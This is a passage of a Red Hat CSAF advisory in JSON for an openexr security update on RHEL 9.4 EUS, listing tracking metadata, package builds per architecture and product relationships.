"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_8871.json"
}
],
"title": "Red Hat Security Advisory: openexr security update",
"tracking": {
"current_release_date": "2026-05-14T22:36:31+00:00",
"generator": {
"date": "2026-05-14T22:36:31+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.0"
}
},
"id": "RHSA-2026:8871",
"initial_release_date": "2026-04-20T03:08:14+00:00",
"revision_history": [
{
"date": "2026-04-20T03:08:14+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-20T03:08:14+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-14T22:36:31+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product": {
"name": "Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_eus:9.4::appstream"
}
}
},
{
"category": "product_name",
"name": "Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product": {
"name": "Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_eus:9.4::crb"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.1-2.el9_4.2.aarch64",
"product": {
"name": "openexr-0:3.1.1-2.el9_4.2.aarch64",
"product_id": "openexr-0:3.1.1-2.el9_4.2.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.1-2.el9_4.2?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.1-2.el9_4.2.aarch64",
"product": {
"name": "openexr-libs-0:3.1.1-2.el9_4.2.aarch64",
"product_id": "openexr-libs-0:3.1.1-2.el9_4.2.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.1-2.el9_4.2?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.1-2.el9_4.2.aarch64",
"product": {
"name": "openexr-debugsource-0:3.1.1-2.el9_4.2.aarch64",
"product_id": "openexr-debugsource-0:3.1.1-2.el9_4.2.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.1-2.el9_4.2?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.1-2.el9_4.2.aarch64",
"product": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_4.2.aarch64",
"product_id": "openexr-debuginfo-0:3.1.1-2.el9_4.2.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.1-2.el9_4.2?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.aarch64",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.aarch64",
"product_id": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.1-2.el9_4.2?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-devel-0:3.1.1-2.el9_4.2.aarch64",
"product": {
"name": "openexr-devel-0:3.1.1-2.el9_4.2.aarch64",
"product_id": "openexr-devel-0:3.1.1-2.el9_4.2.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-devel@3.1.1-2.el9_4.2?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.1-2.el9_4.2.ppc64le",
"product": {
"name": "openexr-0:3.1.1-2.el9_4.2.ppc64le",
"product_id": "openexr-0:3.1.1-2.el9_4.2.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.1-2.el9_4.2?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.1-2.el9_4.2.ppc64le",
"product": {
"name": "openexr-libs-0:3.1.1-2.el9_4.2.ppc64le",
"product_id": "openexr-libs-0:3.1.1-2.el9_4.2.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.1-2.el9_4.2?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.1-2.el9_4.2.ppc64le",
"product": {
"name": "openexr-debugsource-0:3.1.1-2.el9_4.2.ppc64le",
"product_id": "openexr-debugsource-0:3.1.1-2.el9_4.2.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.1-2.el9_4.2?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.1-2.el9_4.2.ppc64le",
"product": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_4.2.ppc64le",
"product_id": "openexr-debuginfo-0:3.1.1-2.el9_4.2.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.1-2.el9_4.2?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.ppc64le",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.ppc64le",
"product_id": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.1-2.el9_4.2?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-devel-0:3.1.1-2.el9_4.2.ppc64le",
"product": {
"name": "openexr-devel-0:3.1.1-2.el9_4.2.ppc64le",
"product_id": "openexr-devel-0:3.1.1-2.el9_4.2.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-devel@3.1.1-2.el9_4.2?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.1-2.el9_4.2.src",
"product": {
"name": "openexr-0:3.1.1-2.el9_4.2.src",
"product_id": "openexr-0:3.1.1-2.el9_4.2.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.1-2.el9_4.2?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.1-2.el9_4.2.x86_64",
"product": {
"name": "openexr-0:3.1.1-2.el9_4.2.x86_64",
"product_id": "openexr-0:3.1.1-2.el9_4.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.1-2.el9_4.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.1-2.el9_4.2.x86_64",
"product": {
"name": "openexr-libs-0:3.1.1-2.el9_4.2.x86_64",
"product_id": "openexr-libs-0:3.1.1-2.el9_4.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.1-2.el9_4.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.1-2.el9_4.2.x86_64",
"product": {
"name": "openexr-debugsource-0:3.1.1-2.el9_4.2.x86_64",
"product_id": "openexr-debugsource-0:3.1.1-2.el9_4.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.1-2.el9_4.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.1-2.el9_4.2.x86_64",
"product": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_4.2.x86_64",
"product_id": "openexr-debuginfo-0:3.1.1-2.el9_4.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.1-2.el9_4.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.x86_64",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.x86_64",
"product_id": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.1-2.el9_4.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-devel-0:3.1.1-2.el9_4.2.x86_64",
"product": {
"name": "openexr-devel-0:3.1.1-2.el9_4.2.x86_64",
"product_id": "openexr-devel-0:3.1.1-2.el9_4.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-devel@3.1.1-2.el9_4.2?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-libs-0:3.1.1-2.el9_4.2.i686",
"product": {
"name": "openexr-libs-0:3.1.1-2.el9_4.2.i686",
"product_id": "openexr-libs-0:3.1.1-2.el9_4.2.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.1-2.el9_4.2?arch=i686"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.1-2.el9_4.2.i686",
"product": {
"name": "openexr-debugsource-0:3.1.1-2.el9_4.2.i686",
"product_id": "openexr-debugsource-0:3.1.1-2.el9_4.2.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.1-2.el9_4.2?arch=i686"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.1-2.el9_4.2.i686",
"product": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_4.2.i686",
"product_id": "openexr-debuginfo-0:3.1.1-2.el9_4.2.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.1-2.el9_4.2?arch=i686"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.i686",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.i686",
"product_id": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.1-2.el9_4.2?arch=i686"
}
}
},
{
"category": "product_version",
"name": "openexr-devel-0:3.1.1-2.el9_4.2.i686",
"product": {
"name": "openexr-devel-0:3.1.1-2.el9_4.2.i686",
"product_id": "openexr-devel-0:3.1.1-2.el9_4.2.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-devel@3.1.1-2.el9_4.2?arch=i686"
}
}
}
],
"category": "architecture",
"name": "i686"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.1-2.el9_4.2.s390x",
"product": {
"name": "openexr-0:3.1.1-2.el9_4.2.s390x",
"product_id": "openexr-0:3.1.1-2.el9_4.2.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.1-2.el9_4.2?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.1-2.el9_4.2.s390x",
"product": {
"name": "openexr-libs-0:3.1.1-2.el9_4.2.s390x",
"product_id": "openexr-libs-0:3.1.1-2.el9_4.2.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.1-2.el9_4.2?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.1-2.el9_4.2.s390x",
"product": {
"name": "openexr-debugsource-0:3.1.1-2.el9_4.2.s390x",
"product_id": "openexr-debugsource-0:3.1.1-2.el9_4.2.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.1-2.el9_4.2?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.1-2.el9_4.2.s390x",
"product": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_4.2.s390x",
"product_id": "openexr-debuginfo-0:3.1.1-2.el9_4.2.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.1-2.el9_4.2?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.s390x",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.s390x",
"product_id": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.1-2.el9_4.2?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-devel-0:3.1.1-2.el9_4.2.s390x",
"product": {
"name": "openexr-devel-0:3.1.1-2.el9_4.2.s390x",
"product_id": "openexr-devel-0:3.1.1-2.el9_4.2.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-devel@3.1.1-2.el9_4.2?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-2.el9_4.2.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.aarch64"
},
"product_reference": "openexr-0:3.1.1-2.el9_4.2.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-2.el9_4.2.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.ppc64le"
},
"product_reference": "openexr-0:3.1.1-2.el9_4.2.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-2.el9_4.2.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.s390x"
},
"product_reference": "openexr-0:3.1.1-2.el9_4.2.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-2.el9_4.2.src as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.src"
},
"product_reference": "openexr-0:3.1.1-2.el9_4.2.src",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-2.el9_4.2.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.x86_64"
},
"product_reference": "openexr-0:3.1.1-2.el9_4.2.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_4.2.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.aarch64"
},
"product_reference": "openexr-debuginfo-0:3.1.1-2.el9_4.2.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_4.2.i686 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.i686"
},
"product_reference": "openexr-debuginfo-0:3.1.1-2.el9_4.2.i686",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_4.2.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.ppc64le"
},
"product_reference": "openexr-debuginfo-0:3.1.1-2.el9_4.2.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_4.2.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.s390x"
},
"product_reference": "openexr-debuginfo-0:3.1.1-2.el9_4.2.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_4.2.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.x86_64"
},
"product_reference": "openexr-debuginfo-0:3.1.1-2.el9_4.2.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-2.el9_4.2.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.aarch64"
},
"product_reference": "openexr-debugsource-0:3.1.1-2.el9_4.2.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-2.el9_4.2.i686 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.i686"
},
"product_reference": "openexr-debugsource-0:3.1.1-2.el9_4.2.i686",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-2.el9_4.2.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.ppc64le"
},
"product_reference": "openexr-debugsource-0:3.1.1-2.el9_4.2.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-2.el9_4.2.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.s390x"
},
"product_reference": "openexr-debugsource-0:3.1.1-2.el9_4.2.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-2.el9_4.2.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.x86_64"
},
"product_reference": "openexr-debugsource-0:3.1.1-2.el9_4.2.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-2.el9_4.2.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.aarch64"
},
"product_reference": "openexr-devel-0:3.1.1-2.el9_4.2.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-2.el9_4.2.i686 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.i686"
},
"product_reference": "openexr-devel-0:3.1.1-2.el9_4.2.i686",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-2.el9_4.2.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.ppc64le"
},
"product_reference": "openexr-devel-0:3.1.1-2.el9_4.2.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-2.el9_4.2.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.s390x"
},
"product_reference": "openexr-devel-0:3.1.1-2.el9_4.2.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-2.el9_4.2.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.x86_64"
},
"product_reference": "openexr-devel-0:3.1.1-2.el9_4.2.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-2.el9_4.2.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.aarch64"
},
"product_reference": "openexr-libs-0:3.1.1-2.el9_4.2.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-2.el9_4.2.i686 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.i686"
},
"product_reference": "openexr-libs-0:3.1.1-2.el9_4.2.i686",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-2.el9_4.2.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.ppc64le"
},
"product_reference": "openexr-libs-0:3.1.1-2.el9_4.2.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-2.el9_4.2.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.s390x"
},
"product_reference": "openexr-libs-0:3.1.1-2.el9_4.2.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-2.el9_4.2.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.x86_64"
},
"product_reference": "openexr-libs-0:3.1.1-2.el9_4.2.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.aarch64"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.i686 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.i686"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.i686",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.ppc64le"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.s390x"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.x86_64"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-2.el9_4.2.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.aarch64"
},
"product_reference": "openexr-0:3.1.1-2.el9_4.2.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-2.el9_4.2.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.ppc64le"
},
"product_reference": "openexr-0:3.1.1-2.el9_4.2.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-2.el9_4.2.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.s390x"
},
"product_reference": "openexr-0:3.1.1-2.el9_4.2.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-2.el9_4.2.src as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.src"
},
"product_reference": "openexr-0:3.1.1-2.el9_4.2.src",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-2.el9_4.2.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.x86_64"
},
"product_reference": "openexr-0:3.1.1-2.el9_4.2.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_4.2.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.aarch64"
},
"product_reference": "openexr-debuginfo-0:3.1.1-2.el9_4.2.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_4.2.i686 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.i686"
},
"product_reference": "openexr-debuginfo-0:3.1.1-2.el9_4.2.i686",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_4.2.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.ppc64le"
},
"product_reference": "openexr-debuginfo-0:3.1.1-2.el9_4.2.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_4.2.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.s390x"
},
